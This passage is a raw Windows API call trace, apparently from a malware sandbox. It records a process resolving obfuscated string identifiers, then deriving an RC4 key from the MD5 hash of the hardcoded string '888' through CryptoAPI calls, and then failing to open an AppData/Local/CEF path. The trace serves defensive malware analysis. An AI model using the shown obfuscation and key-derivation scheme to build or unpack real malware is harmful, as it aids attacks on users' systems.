RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0154.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0154.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0154.586] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa870 [0154.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0154.586] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0154.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.586] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0154.586] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0154.586] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0154.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.587] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0154.587] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0154.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0154.587] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.588] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.588] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0154.588] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0154.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0154.588] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0154.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0154.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0154.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0154.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0154.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0154.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0154.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0154.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0154.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0154.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0154.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0154.589] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0154.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0154.589] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.592] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0154.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0154.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0154.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f40, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0154.593] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9beef0) returned 1 [0154.594] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0154.594] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0154.594] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0154.594] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0154.594] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0154.594] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0154.594] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0154.594] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0154.594] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0154.608] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0154.608] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0154.608] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0154.608] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.608] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.608] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0154.608] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0154.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0154.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaabd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0154.608] CryptCreateHash (in: hProv=0x9beef0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0154.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0154.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ae8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0154.609] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0154.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0154.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0154.609] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.609] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.609] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0154.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaac60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0154.609] CryptHashData (hHash=0x9e1fb8, pbData=0x2a71a68, dwDataLen=0x3, dwFlags=0x1) returned 1 [0154.609] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.609] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.609] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0154.609] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0154.609] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0154.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaacf0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0154.609] CryptDeriveKey (in: hProv=0x9beef0, Algid=0x6601, hBaseData=0x9e1fb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0154.609] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.609] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0154.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0154.610] CryptDestroyHash (hHash=0x9e1fb8) returned 1 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0154.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0154.611] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/CEF" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\cef"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0154.611] GetLastError () returned 0x5 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0154.611] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0154.611] PeekMessageW (in: lpMsg=0x8cf708, 